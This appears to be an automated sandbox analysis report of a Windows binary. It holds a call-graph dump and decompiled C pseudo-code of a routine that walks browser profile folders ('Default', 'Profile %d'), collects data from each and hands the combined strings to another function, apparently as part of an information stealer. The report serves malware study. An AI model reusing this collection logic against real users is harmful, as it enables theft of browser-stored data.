23642 409f79 LocalAlloc 23641->23642 23643 4047d2 23642->23643 23644 409f79 LocalAlloc 23643->23644 23645 4047e8 23644->23645 23646 409f79 LocalAlloc 23645->23646 23647 4047fd 23646->23647 23648 409f79 LocalAlloc 23647->23648 23649 404813 23648->23649 23650 409f79 LocalAlloc 23649->23650 23651 404829 23650->23651 23652 409f79 LocalAlloc 23651->23652 23653 40483f 23652->23653 23654 409f79 LocalAlloc 23653->23654 23655 404855 23654->23655 23656 409f79 LocalAlloc 23655->23656 23657 40486b 23656->23657 23658 409f79 LocalAlloc 23657->23658 23659 404883 23658->23659 23660 409f79 LocalAlloc 23659->23660 23661 404898 23660->23661 23662 409f79 LocalAlloc 23661->23662 23663 4048ae 23662->23663 23664 409f79 LocalAlloc 23663->23664 23665 4048c4 23664->23665 23666 409f79 LocalAlloc 23665->23666 23667 4048da 23666->23667 23668 409f79 LocalAlloc 23667->23668 23669 4048f0 23668->23669 23670 409f79 LocalAlloc 23669->23670 23671 404905 23670->23671 23672 409f79 LocalAlloc 23671->23672 23673 40491b 23672->23673 23674 409f79 LocalAlloc 23673->23674 23675 404931 23674->23675 23676 409f79 LocalAlloc 23675->23676 23677 404947 23676->23677 23678 409f79 LocalAlloc 23677->23678 23679 40495d 23678->23679 23680 409f79 LocalAlloc 23679->23680 23681 404973 23680->23681 23682 409f79 LocalAlloc 23681->23682 23683 404988 23682->23683 23684 409f79 LocalAlloc 23683->23684 23685 40499e 23684->23685 23686 409f79 LocalAlloc 23685->23686 23687 4049b4 23686->23687 23688 409f79 LocalAlloc 23687->23688 23689 4049c9 23688->23689 23690 40a4c2 2 API calls 23689->23690 23691 4049dc 23690->23691 23692 40a4c2 2 API calls 23691->23692 23693 4049ec 23692->23693 23694 40a4c2 2 API calls 23693->23694 23695 4049fc 23694->23695 23696 40a4c2 2 API calls 23695->23696 23697 404a0c 23696->23697 23698 40a4c2 2 API calls 23697->23698 23699 404a1c 23698->23699 23700 40a4c2 2 API calls 23699->23700 23701 404a2c 23700->23701 23702 40a4c2 2 API calls 23701->23702 23703 404a3c 23702->23703 23704 40a4c2 2 API calls 23703->23704 23705 404a4c 23704->23705 23706 40a4c2 2 API calls 23705->23706 23707 404a5c 23706->23707 23708 40a4c2 2 API calls 23707->23708 23709 404a6c 23708->23709 23710 40a4c2 2 API calls 23709->23710 23711 404a7c 23710->23711 23712 40a4c2 2 API calls 23711->23712 23713 404a8c 23712->23713 23714 40a4c2 2 API calls 23713->23714 23715 404a9c 23714->23715 23716 40a4c2 2 API calls 23715->23716 23717 404aac 23716->23717 23718 40a4c2 2 API calls 23717->23718 23719 404abc 23718->23719 23720 40a4c2 2 API calls 23719->23720 23721 404acc 23720->23721 23722 40a4c2 2 API calls 23721->23722 23723 404adc 23722->23723 23724 40a4c2 2 API calls 23723->23724 23725 404aec 23724->23725 23726 40a4c2 2 API calls 23725->23726 23727 404afc 23726->23727 23728 40a4c2 2 API calls 23727->23728 23729 404b0c 23728->23729 23730 40a4c2 2 API calls 23729->23730 23731 404b1c 23730->23731 23732 40a4c2 2 API calls 23731->23732 23733 404b2c 23732->23733 23734 40a4c2 2 API calls 23733->23734 23735 404b3c 23734->23735 23736 40a4c2 2 API calls 23735->23736 23737 404b4c 23736->23737 23738 40a4c2 2 API calls 23737->23738 23739 404b5c 23738->23739 23740 40a4c2 2 API calls 23739->23740 23741 404b6c 23740->23741 23742 40a4c2 2 API calls 23741->23742 23743 404b7c 23742->23743 23744 40a4c2 2 API calls 23743->23744 23745 404b8c 23744->23745 23746 40a4c2 2 API calls 23745->23746 23747 404b9c 23746->23747 23748 40a4c2 2 API calls 23747->23748 23749 404bac 23748->23749 23750 40a4c2 2 API calls 23749->23750 23751 404bbc 23750->23751 23752 40a4c2 2 API calls 23751->23752 23753 404bcc 23752->23753 23754 40a4c2 2 API calls 23753->23754 23755 404bdc 23754->23755 23756 40a4c2 2 API calls 23755->23756 23757 404bec 23756->23757 23758 40a4c2 2 API calls 23757->23758 23759 404bfc 23758->23759 23760 40a4c2 2 API calls 23759->23760 23761 404c0c 23760->23761 23762 40a4c2 2 API calls 23761->23762 23763 404c1c 23762->23763 23764 40a4c2 2 API calls 23763->23764 23765 404c2c 23764->23765 23766 40a4c2 2 API calls 23765->23766 23767 404c3c 23766->23767 23768 40a4c2 2 API calls 23767->23768 23769 404c4c 23768->23769 23770 40a4c2 2 API calls 23769->23770 23771 404c5c 23770->23771 23772 40a4c2 2 API calls 23771->23772 23773 404c6c 23772->23773 23774 40a4c2 2 API calls 23773->23774 23775 404c7c 23774->23775 23776 40a4c2 2 API calls 23775->23776 23777 404c8c 23776->23777 23778 40a4c2 2 API calls 23777->23778 23779 404c9c 23778->23779 23780 40a4c2 2 API calls 23779->23780 23781 404cac 23780->23781 23782 40a4c2 2 API calls 23781->23782 23783 404cbc 23782->23783 23784 40a4c2 2 API calls 23783->23784 23785 404ccc 23784->23785 23786 40a4c2 2 API calls 23785->23786 23787 404cdc 23786->23787 23788 40a4c2 2 API calls 23787->23788 23789 404cec 23788->23789 23790 40a4c2 2 API calls 23789->23790 23791 404cfc 23790->23791 23792 40a4c2 2 API calls 23791->23792 23793 404d0c 23792->23793 23794 40a4c2 2 API calls 23793->23794 23795 404d1c 23794->23795 23796 40a4c2 2 API calls 23795->23796 23797 404d2c 23796->23797 23798 40a4c2 2 API calls 23797->23798 23799 404d3c 23798->23799 23800 40a4c2 2 API calls 23799->23800 23801 404d4c 23800->23801 23802 40a4c2 2 API calls 23801->23802 23803 404d5c 23802->23803 23804 40a4c2 2 API calls 23803->23804 23805 404d6c 23804->23805 23806 40a4c2 2 API calls 23805->23806 23807 404d7c 23806->23807 23808 40a4c2 2 API calls 23807->23808 23809 404d8c 23808->23809 23810 40a4c2 2 API calls 23809->23810 23811 404d9c 23810->23811 23812 40a4c2 2 API calls 23811->23812 23813 404dac 23812->23813 23814 40a4c2 2 API calls 23813->23814 23815 404dbc 23814->23815 23816 40a4c2 2 API calls 23815->23816 23817 404dcc 23816->23817 23818 40a4c2 2 API calls 23817->23818 23819 404ddc 23818->23819 23820 40a4c2 2 API calls 23819->23820 23821 404dec 23820->23821 23822 40a4c2 2 API calls 23821->23822 23823 404dfc 23822->23823 23824 40a4c2 2 API calls 23823->23824 23825 404e07 23824->23825 23826 40a4c2 2 API calls 23825->23826 23827 404e12 23826->23827 23828 40a4c2 2 API calls 23827->23828 23829 404e1d 23828->23829 23830 40a4c2 2 API calls 23829->23830 23831 404e28 23830->23831 23832 40a4c2 2 API calls 23831->23832 23833 404e33 23832->23833 23834 40a4c2 2 API calls 23833->23834 23835 404e3e 23834->23835 23836 40a4c2 2 API calls 23835->23836 23837 404e49 23836->23837 23838 40a4c2 2 API calls 23837->23838 23839 404e54 23838->23839 23840 40a4c2 2 API calls 23839->23840 23841 404e5f 23840->23841 23842 40a4c2 2 API calls 23841->23842 23843 404e6a 23842->23843 23844 40a4c2 2 API calls 23843->23844 23845 404e75 23844->23845 23846 40a4c2 2 API calls 23845->23846 23847 404e80 23846->23847 23848 40a4c2 2 API calls 23847->23848 23849 404e8b 23848->23849 23850 40a4c2 2 API calls 23849->23850 23851 404e96 23850->23851 23852 40a4c2 2 API calls 23851->23852 23853 404ea1 23852->23853 23854 40a4c2 2 API calls 23853->23854 23855 404eb1 23854->23855 23856 40a4c2 2 API calls 23855->23856 23857 404ec1 23856->23857 23858 40a4c2 2 API calls 23857->23858 23859 404ecc 23858->23859 23860 40a4c2 2 API calls 23859->23860 23861 404ed7 23860->23861 23862 40a4c2 2 API calls 23861->23862 23863 404ee2 23862->23863 23864 40a4c2 2 API calls 23863->23864 23865 404eed 23864->23865 23866 40a4c2 2 API calls 23865->23866 23867 404ef8 23866->23867 23868 40a4c2 2 API calls 23867->23868 23869 404f03 23868->23869 23870 40a4c2 2 API calls 23869->23870 23871 404f0e 23870->23871 23872 40a4c2 2 API calls 23871->23872 23873 404f19 23872->23873 23874 40a4c2 2 API calls 23873->23874 23875 404f24 23874->23875 23876 40a4c2 2 API calls 23875->23876 23877 404f2f 23876->23877 23878 40a4c2 2 API calls 23877->23878 23879 404f3a 23878->23879 23880 40a4c2 2 API calls 23879->23880 23881 404f45 23880->23881 23882 40a4c2 2 API calls 23881->23882 23883 404f55 23882->23883 23884 40a4c2 2 API calls 23883->23884 23885 404f65 23884->23885 23886 40a4c2 2 API calls 23885->23886 23887 404f75 23886->23887 23887->23349 23887->23350 23889 40a0e7 GetTokenInformation 23888->23889 23890 40a169 23888->23890 23891 40a102 GetLastError 23889->23891 23892 40a10d GetTokenInformation 23889->23892 23890->23353 23891->23890 23891->23892 23892->23890 23894 40a133 23892->23894 23894->23890 23895 40a148 lstrcmpiW 23894->23895 23896 40a15c 23895->23896 23897 40a15e GlobalFree 23895->23897 23896->23897 23897->23890 23905 40a503 lstrlenW lstrlenW LocalAlloc 23898->23905 23900 408633 23901 40a503 4 API calls 23900->23901 23902 40863f 23901->23902 23904 40403b 23903->23904 23904->23468 23906 40a543 23905->23906 23907 40a54d GlobalFree 23906->23907 23907->23900

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 94 401e18-401e77 99 401e79-401e86 PathCombineW 94->99 100 401e8b-401ea8 94->100 101 4022eb-4022ee 99->101 106 401eb1-401f66 call 401c87 100->106 107 401eaa-401eac 100->107 103 4022f1-402318 101->103 111 40231a-40232c 103->111 112 40232e-40233b wsprintfW 103->112 143 4022a7-4022e2 LocalFree * 6 106->143 144 401f6c-401fd5 call 4027b8 call 402cb8 call 403760 call 403236 lstrlenW * 2 106->144 108 4027b3-4027b7 107->108 113 40233e-40235b PathCombineW FindFirstFileW 111->113 112->113 115 402361-402454 LocalAlloc * 4 call 401c87 call 4027b8 call 402cb8 call 403760 call 403236 lstrlenW * 2 113->115 116 40276b-402777 LocalFree 113->116 141 4024b6-4024d1 lstrlenW * 2 115->141 142 402456-4024b5 call 40a503 * 5 115->142 118 402780-402787 116->118 119 402779-40277a LocalFree 116->119 118->103 122 40278d-4027b0 LocalFree * 4 118->122 119->118 122->108 147 4024d3-402537 call 40a503 * 5 141->147 148 402539 141->148 142->141 143->101 146 4022e4-4022e5 LocalFree 143->146 183 402037-402052 lstrlenW * 2 144->183 184 401fd7-402036 call 40a503 * 5 144->184 146->101 151 40253c-40254c 147->151 148->151 164 4025b6-4025c2 151->164 165 40254e-4025b3 call 40a503 * 5 151->165 179 402630-402648 call 403c8f 164->179 180 4025c4-40262d call 40a503 * 5 164->180 165->164 200 402653-4026db call 40a05f call 40a503 call 408619 179->200 201 40264a-40264d 179->201 180->179 189 402054-4020b8 call 40a503 * 5 183->189 190 4020ba 183->190 184->183 202 4020bd-4020cd 189->202 190->202 279 402718-402732 LocalFree * 4 200->279 280 4026dd-4026f5 200->280 201->200 207 402738-402768 LocalFree * 5 201->207 215 402131-40213d 202->215 216 4020cf-40212e call 40a503 * 5 202->216 207->116 238 40219f-4021b7 call 403c8f 215->238 239 40213f-40219c call 40a503 * 5 215->239 216->215 256 4021c2-40224a call 40a05f call 40a503 call 408619 238->256 257 4021b9-4021bc 238->257 239->238 291 402287-4022a1 LocalFree * 4 256->291 292 40224c-402264 256->292 257->143 257->256 279->207 280->279 285 4026f7-402710 call 407edb 280->285 288 402715 285->288 288->279 291->143 292->291 294 402266-402284 call 407edb 292->294 294->291
                                                                                                                                                                        C-Code - Quality: 55%
                                                                                                                                                                        			E00401E18(WCHAR* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                        				void* _v16;
                                                                                                                                                                        				void* _v20;
                                                                                                                                                                        				void* _v24;
                                                                                                                                                                        				void* _v28;
                                                                                                                                                                        				void* _v32;
                                                                                                                                                                        				void* _v36;
                                                                                                                                                                        				void* _v40;
                                                                                                                                                                        				void* _v44;
                                                                                                                                                                        				void* _v48;
                                                                                                                                                                        				void* _v52;
                                                                                                                                                                        				signed int _v56;
                                                                                                                                                                        				signed int _v60;
                                                                                                                                                                        				void* _v64;
                                                                                                                                                                        				signed int _v68;
                                                                                                                                                                        				char _v72;
                                                                                                                                                                        				intOrPtr _v76;
                                                                                                                                                                        				void* _v80;
                                                                                                                                                                        				intOrPtr _v84;
                                                                                                                                                                        				signed int _v88;
                                                                                                                                                                        				char _v92;
                                                                                                                                                                        				WCHAR* _v96;
                                                                                                                                                                        				intOrPtr _v100;
                                                                                                                                                                        				intOrPtr _v104;
                                                                                                                                                                        				void* _v108;
                                                                                                                                                                        				intOrPtr _v112;
                                                                                                                                                                        				intOrPtr _v116;
                                                                                                                                                                        				void* _v120;
                                                                                                                                                                        				intOrPtr _v124;
                                                                                                                                                                        				intOrPtr _v128;
                                                                                                                                                                        				void* _v132;
                                                                                                                                                                        				intOrPtr _v136;
                                                                                                                                                                        				intOrPtr _v140;
                                                                                                                                                                        				intOrPtr _v144;
                                                                                                                                                                        				intOrPtr _v148;
                                                                                                                                                                        				struct _WIN32_FIND_DATAW _v744;
                                                                                                                                                                        				void* _t245;
                                                                                                                                                                        				void* _t247;
                                                                                                                                                                        				void* _t249;
                                                                                                                                                                        				void* _t255;
                                                                                                                                                                        				void* _t257;
                                                                                                                                                                        				void* _t259;
                                                                                                                                                                        				void* _t261;
                                                                                                                                                                        				void* _t263;
                                                                                                                                                                        				signed int _t265;
                                                                                                                                                                        				void* _t267;
                                                                                                                                                                        				void* _t271;
                                                                                                                                                                        				signed int _t277;
                                                                                                                                                                        				void* _t284;
                                                                                                                                                                        				void* _t286;
                                                                                                                                                                        				void* _t292;
                                                                                                                                                                        				void* _t294;
                                                                                                                                                                        				void* _t302;
                                                                                                                                                                        				void* _t304;
                                                                                                                                                                        				void* _t306;
                                                                                                                                                                        				void* _t308;
                                                                                                                                                                        				void* _t310;
                                                                                                                                                                        				void* _t312;
                                                                                                                                                                        				int _t321;
                                                                                                                                                                        				WCHAR* _t322;
                                                                                                                                                                        				int _t324;
                                                                                                                                                                        				WCHAR* _t325;
                                                                                                                                                                        				void* _t334;
                                                                                                                                                                        				void* _t336;
                                                                                                                                                                        				void* _t337;
                                                                                                                                                                        				void* _t339;
                                                                                                                                                                        				void* _t340;
                                                                                                                                                                        				char _t341;
                                                                                                                                                                        				void* _t342;
                                                                                                                                                                        				void* _t361;
                                                                                                                                                                        				void* _t363;
                                                                                                                                                                        				intOrPtr _t366;
                                                                                                                                                                        				intOrPtr _t367;
                                                                                                                                                                        				void* _t368;
                                                                                                                                                                        				void* _t370;
                                                                                                                                                                        				intOrPtr _t373;
                                                                                                                                                                        				intOrPtr _t374;
                                                                                                                                                                        				void* _t375;
                                                                                                                                                                        				void* _t377;
                                                                                                                                                                        				intOrPtr _t380;
                                                                                                                                                                        				intOrPtr _t381;
                                                                                                                                                                        				void* _t382;
                                                                                                                                                                        				void* _t384;
                                                                                                                                                                        				intOrPtr _t387;
                                                                                                                                                                        				intOrPtr _t388;
                                                                                                                                                                        				int _t396;
                                                                                                                                                                        				WCHAR* _t397;
                                                                                                                                                                        				int _t398;
                                                                                                                                                                        				int _t399;
                                                                                                                                                                        				WCHAR* _t400;
                                                                                                                                                                        				int _t401;
                                                                                                                                                                        				signed int _t403;
                                                                                                                                                                        				signed int _t405;
                                                                                                                                                                        				void* _t409;
                                                                                                                                                                        				void* _t411;
                                                                                                                                                                        				void* _t412;
                                                                                                                                                                        				void* _t414;
                                                                                                                                                                        				void* _t415;
                                                                                                                                                                        				char _t416;
                                                                                                                                                                        				void* _t417;
                                                                                                                                                                        				signed int _t427;
                                                                                                                                                                        				void* _t431;
                                                                                                                                                                        				void* _t433;
                                                                                                                                                                        				intOrPtr _t436;
                                                                                                                                                                        				signed int _t437;
                                                                                                                                                                        				void* _t438;
                                                                                                                                                                        				void* _t440;
                                                                                                                                                                        				intOrPtr _t443;
                                                                                                                                                                        				signed int _t444;
                                                                                                                                                                        				void* _t445;
                                                                                                                                                                        				void* _t447;
                                                                                                                                                                        				intOrPtr _t450;
                                                                                                                                                                        				signed int _t451;
                                                                                                                                                                        				void* _t452;
                                                                                                                                                                        				void* _t454;
                                                                                                                                                                        				intOrPtr _t457;
                                                                                                                                                                        				signed int _t458;
                                                                                                                                                                        				void* _t461;
                                                                                                                                                                        				void* _t476;
                                                                                                                                                                        				signed int _t507;
                                                                                                                                                                        				void* _t536;
                                                                                                                                                                        				intOrPtr _t541;
                                                                                                                                                                        				intOrPtr _t543;
                                                                                                                                                                        				intOrPtr _t546;
                                                                                                                                                                        				intOrPtr _t548;
                                                                                                                                                                        				intOrPtr _t551;
                                                                                                                                                                        				intOrPtr _t553;
                                                                                                                                                                        				intOrPtr _t556;
                                                                                                                                                                        				intOrPtr _t558;
                                                                                                                                                                        				void* _t564;
                                                                                                                                                                        				intOrPtr _t569;
                                                                                                                                                                        				intOrPtr _t571;
                                                                                                                                                                        				intOrPtr _t574;
                                                                                                                                                                        				intOrPtr _t576;
                                                                                                                                                                        				intOrPtr _t579;
                                                                                                                                                                        				intOrPtr _t581;
                                                                                                                                                                        				intOrPtr _t584;
                                                                                                                                                                        				intOrPtr _t586;
                                                                                                                                                                        				void* _t588;
                                                                                                                                                                        				void* _t589;
                                                                                                                                                                        				int _t591;
                                                                                                                                                                        				void* _t595;
                                                                                                                                                                        				void* _t598;
                                                                                                                                                                        				void* _t617;
                                                                                                                                                                        				signed int _t621;
                                                                                                                                                                        				void* _t623;
                                                                                                                                                                        				signed int _t634;
                                                                                                                                                                        				void* _t636;
                                                                                                                                                                        				void* _t644;
                                                                                                                                                                        				void* _t648;
                                                                                                                                                                        				void* _t651;
                                                                                                                                                                        
                                                                                                                                                                        				_v100 = __edx;
                                                                                                                                                                        				_t588 = 0x40;
                                                                                                                                                                        				_v84 = 0;
                                                                                                                                                                        				_v96 = __ecx;
                                                                                                                                                                        				_t245 =  *((intOrPtr*)( *0x40e044))(_t588, 0x208);
                                                                                                                                                                        				_t461 = _t245;
                                                                                                                                                                        				_t247 =  *((intOrPtr*)( *0x40e044))(_t588, 0x208);
                                                                                                                                                                        				_v44 = _t247;
                                                                                                                                                                        				_t249 =  *((intOrPtr*)( *0x40e044))(_t588, 0x400);
                                                                                                                                                                        				_v80 = _t249;
                                                                                                                                                                        				_v28 =  *((intOrPtr*)( *0x40e044))(_t588, 0x100);
                                                                                                                                                                        				if(_a12 != 0) {
                                                                                                                                                                        					_t461 =  *((intOrPtr*)( *0x40e13c))(_t461, __ecx);
                                                                                                                                                                        					_t255 =  *((intOrPtr*)( *0x40e018))(_t461,  &_v744);
                                                                                                                                                                        					__eflags = _t255 - 0xffffffff;
                                                                                                                                                                        					if(_t255 == 0xffffffff) {
                                                                                                                                                                        						return 0;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t257 =  *((intOrPtr*)( *0x40e044))(_t588, 0x400);
                                                                                                                                                                        					_v16 = _t257;
                                                                                                                                                                        					_t259 =  *((intOrPtr*)( *0x40e044))(_t588, 0x80);
                                                                                                                                                                        					_v36 = _t259;
                                                                                                                                                                        					_t261 =  *((intOrPtr*)( *0x40e044))(_t588, 0x200000);
                                                                                                                                                                        					_v48 = _t261;
                                                                                                                                                                        					_v32 = _t261;
                                                                                                                                                                        					_t263 =  *((intOrPtr*)( *0x40e044))(_t588, 0x200000);
                                                                                                                                                                        					_v52 = _t263;
                                                                                                                                                                        					_t265 =  *((intOrPtr*)( *0x40e044))(_t588, 0x800000);
                                                                                                                                                                        					_v40 = _t265;
                                                                                                                                                                        					_v88 = _t265;
                                                                                                                                                                        					_t267 =  *((intOrPtr*)( *0x40e044))(_t588, 0x400000);
                                                                                                                                                                        					_v12 = _v12 & 0x00000000;
                                                                                                                                                                        					_v56 = _v56 & 0x00000000;
                                                                                                                                                                        					_v60 = _t267;
                                                                                                                                                                        					_v24 = _t267;
                                                                                                                                                                        					_v84 = 1;
                                                                                                                                                                        					_t271 =  *((intOrPtr*)( *0x40e044))(_t588, 0x400);
                                                                                                                                                                        					_v20 = _t271;
                                                                                                                                                                        					_v64 =  *((intOrPtr*)( *0x40e044))(_t588, 0x1000);
                                                                                                                                                                        					_t277 = E00401C87(__ecx, _v36,  &_v44,  &_v80,  &_v28, _a12);
                                                                                                                                                                        					_t644 = _t644 + 0x10;
                                                                                                                                                                        					__eflags = _t277;
                                                                                                                                                                        					if(__eflags == 0) {
                                                                                                                                                                        						L20:
                                                                                                                                                                        						LocalFree(_v48);
                                                                                                                                                                        						LocalFree(_v40);
                                                                                                                                                                        						LocalFree(_v60);
                                                                                                                                                                        						LocalFree(_v20);
                                                                                                                                                                        						LocalFree(_v64);
                                                                                                                                                                        						LocalFree(_v36);
                                                                                                                                                                        						_t284 = _v16;
                                                                                                                                                                        						__eflags = _t284;
                                                                                                                                                                        						if(_t284 != 0) {
                                                                                                                                                                        							LocalFree(_t284);
                                                                                                                                                                        						}
                                                                                                                                                                        						goto L22;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t606 = _v80;
                                                                                                                                                                        						_t631 = _v44;
                                                                                                                                                                        						E004027B8( &_v32,  &_v16, __eflags, __ecx, _v44, _v80, _a4);
                                                                                                                                                                        						E00402CB8( &_v88,  &_v16, __eflags,  &_v32, _v44, _v80, _a4);
                                                                                                                                                                        						E00403760( &_v24, _t631, _a4);
                                                                                                                                                                        						_t501 =  &_v52;
                                                                                                                                                                        						E00403236( &_v52,  &_v16, __eflags,  &_v24, _t631, _t606, _a4);
                                                                                                                                                                        						_t651 = _t644 + 0x38;
                                                                                                                                                                        						_t396 = lstrlenW( *0x40e21c);
                                                                                                                                                                        						_t397 = _v88;
                                                                                                                                                                        						_v40 = _t397;
                                                                                                                                                                        						_t398 = lstrlenW(_t397);
                                                                                                                                                                        						__eflags = _t398 - _t396;
                                                                                                                                                                        						if(_t398 >= _t396) {
                                                                                                                                                                        							_t452 = E0040A503(_v40, _t461);
                                                                                                                                                                        							_t584 =  *0x40e20c; // 0x6d5a78
                                                                                                                                                                        							_t454 = E0040A503(E0040A503(_t452, _t584), _v16);
                                                                                                                                                                        							_t586 =  *0x40e20c; // 0x6d5a78
                                                                                                                                                                        							_t501 = E0040A503(E0040A503(_t454, _t586), _v28);
                                                                                                                                                                        							_v12 = 1;
                                                                                                                                                                        							_t457 =  *0x40e220; // 0x6ec2f0
                                                                                                                                                                        							_v76 = _t457;
                                                                                                                                                                        							_t458 =  *0x40e1e8; // 0x6d5b18
                                                                                                                                                                        							_v72 = _t501;
                                                                                                                                                                        							_v68 = _t458;
                                                                                                                                                                        							asm("movsd");
                                                                                                                                                                        							_v40 = _t501;
                                                                                                                                                                        							asm("movsd");
                                                                                                                                                                        							asm("movsd");
                                                                                                                                                                        						}
                                                                                                                                                                        						_t399 = lstrlenW( *0x40e1a4);
                                                                                                                                                                        						_t400 = _v32;
                                                                                                                                                                        						_v48 = _t400;
                                                                                                                                                                        						_t401 = lstrlenW(_t400);
                                                                                                                                                                        						__eflags = _t401 - _t399;
                                                                                                                                                                        						if(_t401 < _t399) {
                                                                                                                                                                        							_t634 = _v12;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							_t445 = E0040A503(_v48, _t461);
                                                                                                                                                                        							_t579 =  *0x40e20c; // 0x6d5a78
                                                                                                                                                                        							_t447 = E0040A503(E0040A503(_t445, _t579), _v16);
                                                                                                                                                                        							_t581 =  *0x40e20c; // 0x6d5a78
                                                                                                                                                                        							_t501 = E0040A503(E0040A503(_t447, _t581), _v28);
                                                                                                                                                                        							_t450 =  *0x40e1d8; // 0x6ed8d8
                                                                                                                                                                        							_v76 = _t450;
                                                                                                                                                                        							_t451 =  *0x40e1e8; // 0x6d5b18
                                                                                                                                                                        							_v72 = _t501;
                                                                                                                                                                        							_v68 = _t451;
                                                                                                                                                                        							_v48 = _t501;
                                                                                                                                                                        							asm("movsd");
                                                                                                                                                                        							asm("movsd");
                                                                                                                                                                        							asm("movsd");
                                                                                                                                                                        							_t634 = _v12 + 1;
                                                                                                                                                                        							_v12 = _t634;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t588 = _v24;
                                                                                                                                                                        						_v60 = _t588;
                                                                                                                                                                        						_t403 =  *((intOrPtr*)( *0x40e08c))(_t588);
                                                                                                                                                                        						__eflags = _t403;
                                                                                                                                                                        						if(_t403 > 0) {
                                                                                                                                                                        							_t438 = E0040A503(_t588, _t461);
                                                                                                                                                                        							_t574 =  *0x40e20c; // 0x6d5a78
                                                                                                                                                                        							_t440 = E0040A503(E0040A503(_t438, _t574), _v16);
                                                                                                                                                                        							_t576 =  *0x40e20c; // 0x6d5a78
                                                                                                                                                                        							_t501 = E0040A503(E0040A503(_t440, _t576), _v28);
                                                                                                                                                                        							_t443 =  *0x40e22c; // 0x6ed5c8
                                                                                                                                                                        							_v76 = _t443;
                                                                                                                                                                        							_t444 =  *0x40e1e8; // 0x6d5b18
                                                                                                                                                                        							_v72 = _t501;
                                                                                                                                                                        							_t588 = _v20 + _t634 * 0xc;
                                                                                                                                                                        							_v68 = _t444;
                                                                                                                                                                        							_v60 = _t501;
                                                                                                                                                                        							asm("movsd");
                                                                                                                                                                        							asm("movsd");
                                                                                                                                                                        							asm("movsd");
                                                                                                                                                                        							_t634 = _v12 + 1;
                                                                                                                                                                        							__eflags = _t634;
                                                                                                                                                                        							_v12 = _t634;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t405 =  *((intOrPtr*)( *0x40e08c))(_v52);
                                                                                                                                                                        						__eflags = _t405;
                                                                                                                                                                        						if(_t405 > 0) {
                                                                                                                                                                        							_t431 = E0040A503(_v52, _t461);
                                                                                                                                                                        							_t569 =  *0x40e20c; // 0x6d5a78
                                                                                                                                                                        							_t433 = E0040A503(E0040A503(_t431, _t569), _v16);
                                                                                                                                                                        							_t571 =  *0x40e20c; // 0x6d5a78
                                                                                                                                                                        							_t501 = E0040A503(E0040A503(_t433, _t571), _v28);
                                                                                                                                                                        							_t436 =  *0x40e214; // 0x6eef00
                                                                                                                                                                        							_v76 = _t436;
                                                                                                                                                                        							_t437 =  *0x40e1e8; // 0x6d5b18
                                                                                                                                                                        							_v72 = _t435;
                                                                                                                                                                        							_t588 = _v20 + _t634 * 0xc;
                                                                                                                                                                        							_v68 = _t437;
                                                                                                                                                                        							asm("movsd");
                                                                                                                                                                        							asm("movsd");
                                                                                                                                                                        							asm("movsd");
                                                                                                                                                                        							_t634 = _v12 + 1;
                                                                                                                                                                        							__eflags = _t634;
                                                                                                                                                                        							_v12 = _t634;
                                                                                                                                                                        						}
                                                                                                                                                                        						E00403C8F(_a8, _v64,  &_v56, _t501, _v44);
                                                                                                                                                                        						_t644 = _t651 + 0xc;
                                                                                                                                                                        						__eflags = _t634;
                                                                                                                                                                        						if(_t634 != 0) {
                                                                                                                                                                        							L16:
                                                                                                                                                                        							_t409 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        							_t411 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        							_t564 = 0x10;
                                                                                                                                                                        							_t412 = E0040A05F(_t409, _t564);
                                                                                                                                                                        							_v24 = _t412;
                                                                                                                                                                        							_t414 =  *((intOrPtr*)( *0x40e13c))(_t411,  *0x40e210);
                                                                                                                                                                        							_t588 = _v24;
                                                                                                                                                                        							_t415 = E0040A503(_t414, _t588);
                                                                                                                                                                        							_v88 = _v88 & 0x00000000;
                                                                                                                                                                        							_v32 = _t415;
                                                                                                                                                                        							_t416 =  *0x40e204; // 0x6d5b78
                                                                                                                                                                        							_v92 = _t416;
                                                                                                                                                                        							_t417 = E00408619( &_v32);
                                                                                                                                                                        							_v24 = _t417;
                                                                                                                                                                        							_t636 =  *((intOrPtr*)( *0x40e044))(0x40, 0x184);
                                                                                                                                                                        							_t507 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t588, 0xffffffff, 0, 0, 0, 0);
                                                                                                                                                                        							__eflags = _t507;
                                                                                                                                                                        							if(_t507 != 0) {
                                                                                                                                                                        								_t427 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t588, 0xffffffff, _t636, _t507, 0, 0);
                                                                                                                                                                        								__eflags = _t427;
                                                                                                                                                                        								if(_t427 != 0) {
                                                                                                                                                                        									E00407EDB(_v100, _t636, _v12, _v20, _v56, _v64, _v24,  &_v92);
                                                                                                                                                                        									_t644 = _t644 + 0x18;
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        							LocalFree(_t636);
                                                                                                                                                                        							LocalFree(_v24);
                                                                                                                                                                        							LocalFree(_v32);
                                                                                                                                                                        							LocalFree(_t588);
                                                                                                                                                                        							goto L20;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							__eflags = _v56 - _t634;
                                                                                                                                                                        							if(_v56 <= _t634) {
                                                                                                                                                                        								goto L20;
                                                                                                                                                                        							}
                                                                                                                                                                        							goto L16;
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        				} else {
                                                                                                                                                                        					PathCombineW(_t461, __ecx, L"Default");
                                                                                                                                                                        					L22:
                                                                                                                                                                        					_t589 = _t588 | 0xffffffff;
                                                                                                                                                                        					_v48 = _t589;
                                                                                                                                                                        					do {
                                                                                                                                                                        						_t286 =  *((intOrPtr*)( *0x40e044))(0x40, 0x400);
                                                                                                                                                                        						_v16 = _t286;
                                                                                                                                                                        						_t617 =  *((intOrPtr*)( *0x40e044))(0x40, 0x80);
                                                                                                                                                                        						_v88 = _t617;
                                                                                                                                                                        						if(_t589 != 0xffffffff) {
                                                                                                                                                                        							wsprintfW(_t617, L"Profile %d", _t589);
                                                                                                                                                                        							_t644 = _t644 + 0xc;
